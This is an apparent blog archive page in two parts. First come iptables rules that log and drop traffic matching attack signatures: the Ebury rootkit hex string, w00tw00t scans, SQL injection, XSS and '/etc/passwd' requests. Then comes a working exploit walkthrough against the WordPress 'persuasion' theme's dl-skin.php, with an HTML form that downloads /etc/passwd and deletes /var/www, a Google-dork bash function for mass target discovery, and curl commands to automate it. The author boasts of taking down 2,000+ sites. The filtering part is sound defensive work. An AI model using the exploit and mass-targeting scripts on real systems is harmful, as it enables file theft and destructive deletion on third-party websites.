Tag Archive: Arbitrary File Download

IPtables is not an ordinary firewall unless and until not used properly.

Their are cases where security analysts do not have an option to play with hardware firewall or sometime no access to DC, mainly cpanel servers.

In this case, the only option is customized solution, one of the kind is shown below,



with iptables string matching, you can achieve the highest security possible with log scanning if anything bypasses firewall.

This is mainly IPS/IDS dependent upon the signature matching.

  1. Create a chain, say “woot”
  2. After all the input rules, goto woot chain for additional checks.
  3. then specify malicious signatures to detect different types of attacks.
  4. If matches then first log the packet and then drop.

your iptables file should be something like below,

:INPUT ACCEPT [2404:336622]
:OUTPUT ACCEPT [2359:257349]
:LOGGING – [0:0]
:w00t – [0:0]

-A INPUT -i lo -j ACCEPT
-A INPUT -s x.x.x.x -p tcp -m tcp –dport 22 -j ACCEPT
-A INPUT -s x.x.x.x -p tcp -m tcp –dport 22 -j ACCEPT

-A INPUT -p tcp -j w00t

-A OUTPUT -p tcp -m tcp –dport 53 -m string –hex-string “|120b01000001|” –algo bm –to 65535 -j LOG –log-prefix “Ebury SSH Rootkit:” –log-level 7
-A OUTPUT -p tcp -m tcp –dport 53 -m string –hex-string “|120b01000001|” –algo bm –to 65535 -j DROP

-A w00t -p tcp -m string –string “w00tw00t.at.ISC.SANS” –algo bm –to 65535 -j LOG –log-prefix “w00tw00t detected:” –log-level 7
-A w00t -p tcp -m string –string “w00tw00t.at.ISC.SANS” –algo bm –to 65535 -j DROP

The above will first log packets (chain woot), and then drop it.


Apr 14 20:19:29 darkwizz kernel: w00tw00t detected:IN=eth0 OUT= MAC=00:30:48:8f:49:c9:01:24:00:08:00 SRC=x.x.x.x DST= LEN=86 TOS=0x00 PREC=0x00 TTL=115 ID=10415 DF PROTO=TCP SPT=59420 DPT=80 WINDOW=256 RES=0x00 ACK PSH FIN URGP=0

Test Scenarios:

1. open a command line and type in,

nc -l 5501

2. open another session of that server

telnet server-ip 5501

from telnet command line,


3. first session where you typed in nc command, you’ll see “test” appearing on that session

4. from second terminal (point 2), type in  “w00tw00t”

5. string won’t appear on first session and then consequent packets will be dropped from that server.

6. check the logs and you will see.

Where to find the log location for iptables?

cat /etc/syslog.cong

kern.*                        /var/log/firewall.log

Back to our firewall rules,

their is outbound traffic from server getting dropped if it matches a hex-string, “120b01000001” which is a string for Ebury Trojan.

you can easily convert any snort rules into IP table rules.

Some Rules according to types of attacks,

1. SQL Injection Attacks: 

The “%27or%271%27%3D%271” was an encoding. When decoding the URL, it would result as a message ‘ or ‘1’=’1.

-m string –string  “%27+or+%271%27%3d%271”









2. Buffer Overflow Exploits


Recently I posted “http://ustechnica.com/category/security/wordpress-arbitrary-file-download-and-file-deletion-exploit/”

and was able to download /etc/passwd file, you can even match this string and drop the request.

3. Arbitrary File download

-m string –string “/etc/passwd”

4. Cross Site Scripting

-m string –string %3C%73%63%72%69%70%74%3E”

-m string –string “<script>”

you just need to convert all snort rules to iptables, below is the good reference can be used,




I don’t know why developers around the globe are so much into copy and pasting it before actually checking out things manually?

This is just a standard example where Security Admins/System Admins will be screwed big time.

Tip for Security Admins:

  • Have proper checks and URL Sanitization, any requests to OS files or file that can bring your server down, block that IP.
  • Analyze logs, have automated script to parse logs for malicious request, IP’s.
  • keep yourself updated with latest hacks and vulnerabilities
  • have IDS for any new application installed and check for any vulnerabilities associated with it.

Enough of consultancy!!!

How to exploit?

1. Google Dork,





2. A test domain hosted on a server, mine was testing.com (NOT LIVE), behind TOR 😉

Add below exploit under public_html, say test.html

<form action=”http://vulnerable-site.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php&#8221; method=”post”>
Existing file’s name:<input type=”text” name=”_mysite_download_skin” value=”/etc/passwd”><br>
Directory to be removed:<input type=”text” name=”_mysite_delete_skin_zip” value=”/var/www”><font color=red>Use with caution it will delete the files and directories if it is writeable</font><br>
<input type=”submit”  name=press value=”OK”>



3. you’ll find /etc/passwd downloaded, check /home/ and just delete it by specifying the path in above test box.

3 4

4. Imagine it’s coded and automated,

you can have something like, create a function say, google and search as shown below,


function google { Q=”$@”; GOOG_URL=’https://www.google.de/search?tbs=li:1&q=&#8217;; AGENT=”Mozilla/4.0″; stream=$(curl -A “$AGENT” -skLm 10 “${GOOG_URL}${Q//\ /+}” | grep -oP ‘\/url\?q=.+?&amp’ | sed ‘s|/url?q=||; s|&amp||’); echo -e “${stream//\%/\x}”; }

Sample Output:

[root@BT]# google inurl:wp-content/themes/persuasion/lib/scripts/ | sed ‘s/scripts.*$/scripts/’ | uniq

Then you can have curl to check the HTTP status code of above searches,

URL=`google inurl:wp-content/themes/persuasion/lib/scripts/ | sed ‘s/scripts.*$/scripts/’`

for STATUS in $URL
HTTP_STATUS_CODE=`curl -s -o /dev/null -I -w “%{http_code}” http://www.bydelight.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php`

if [ “$HTTP_STATUS_CODE” == 200 ];


curl command to post data


echo “message”



curl command used with  formfind can be used to web forms or below command,

[root@BT]# curl –data “_mysite_download_skin=%2Fetc%2Fpasswd&_mysite_delete_skin_zip=%2Fvar%2Fwww&press=%20OK%20” –dump-header headers http://www.testing.com/test.html

If unaware about Curl, you can use FireCurl to get the response of curl command

In no time, you’ll end up bringing down 2k+ websites.

Vulnerable Script: